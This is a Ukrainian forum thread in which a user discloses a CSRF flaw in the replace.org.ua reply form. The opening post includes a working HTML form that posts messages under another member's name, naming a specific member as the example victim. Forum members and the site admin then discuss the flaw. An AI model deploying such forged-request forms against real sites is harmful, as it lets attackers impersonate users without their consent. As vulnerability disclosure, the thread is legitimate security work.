1 Востаннє редагувалося VTrim (26.12.2014 20:43:58)

Тема: CSRF вразливість на реплейсі

Хоча тут у формах є поле

<input type="hidden" name="csrf_token" value="93d0dcef922cd62a49f0d3e70a10f12a51de9afc" />

Та в даному випадку воно взагалі не діє (бо на сервері не перевіряється),перевіряється тільки form_user (користувач,який відправляє запит)

Розмістивши наступну кнопку у себе на сайті

<form method="post" accept-charset="utf-8" action="http://replace.org.ua/new/reply/719/">
<input type="hidden" name="form_sent" value="1">
<input type="hidden" name="form_user" value="FakiNyan">
<input type="hidden" name="req_message" value="test">
<input type="submit" name="submit_button" value="Натисни">
</form>

і вибравши за жертву користувача (допустимо FakiNyan),робимо все щоб він натиснув ту кнопочку :),після чого,від імені цього користувача прилетить повідомлення на форум з написом test у ту тему,action якої ми вказали (в даному випадку http://replace.org.ua/topic/719/)

Можете протестувати,вказавши свій нік.

В інших місцях форуму не перевіряв,можливо і там є така помилка.

Подякували: quez, 0xDADA11C7, Djalin, leofun014

2

Re: CSRF вразливість на реплейсі

А жертву ви, звісно, обрали випадковим чином.

3

Re: CSRF вразливість на реплейсі

quez написав:

А жертву ви, звісно, обрали випадковим чином.

аГа.

4

Re: CSRF вразливість на реплейсі

Replаce написав:

:D

+ баг з реєстрацією однакових ніків:)

5

Re: CSRF вразливість на реплейсі

VTrim написав:
Replаce написав:

:D

+ баг з реєстрацією однакових ніків:)

це не баг, бо ніки не однакові. І це вже було.

6

Re: CSRF вразливість на реплейсі

Replace написав:
VTrim написав:
Replаce написав:

:D

+ баг з реєстрацією однакових ніків:)

це не баг, бо ніки не однакові. І це вже було.

Але це є помилка,хоч і тема не про це

7

Re: CSRF вразливість на реплейсі

Перевірка на csrf_token є лише для модераторів/адміністраторів.
У звичайних користувачів немає.

Нічого такого страшного зробити за допомогою цієї вразливості не можна. Якщо увімкнути перевірку, то це додасть незручності тим користувачам, у яких IP змінюється динамічно, оскільки csrf_token залежить від IP.

8

Re: CSRF вразливість на реплейсі

В оригінальному тесті повідомлення (req_message) трохи інакше було  :)

9

Re: CSRF вразливість на реплейсі

Replace написав:

Перевірка на csrf_token є лише для модераторів/адміністраторів.
У звичайних користувачів немає.

Нічого такого страшного зробити за допомогою цієї вразливості не можна. Якщо увімкнути перевірку, то це додасть незручності тим користувачам, у яких IP змінюється динамічно, оскільки csrf_token залежить від IP.

Так захист відключений тільки у цьому місці? Бо в інших формах є захист і він працює.

10

Re: CSRF вразливість на реплейсі

Якщо ви перевіряли, то тоді так :)

11

Re: CSRF вразливість на реплейсі

перевіряв

12

Re: CSRF вразливість на реплейсі

Є юзер такий, чендлер) він давно тестив цей прикол і казав що тут є дірка))